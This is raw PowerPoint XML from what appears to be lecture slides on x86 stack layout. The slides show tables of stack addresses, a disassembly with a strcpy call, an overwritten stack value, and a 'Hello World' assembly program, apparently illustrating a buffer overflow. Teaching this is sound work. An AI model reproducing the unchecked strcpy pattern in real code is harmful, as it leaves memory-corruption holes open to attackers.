    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13506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41200236"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e66310</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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339</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804843a</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804841d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048426</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048440</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4755547" y="333048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Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479672" y="1765141"/>
            <a:ext cx="2831284" cy="93025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 * 50</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11429658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Hello World!</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t>.data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	.string "Hello World\n"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	$4,%eax	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$1,%ebx	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 	$12,%edx	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>		$0x80	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	$0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	ret	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112496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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7f8684c</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pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x62636465</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e66310</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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340</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104735" y="101012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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804843a</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804841d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048426</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048440</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff63c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff640</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff646</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
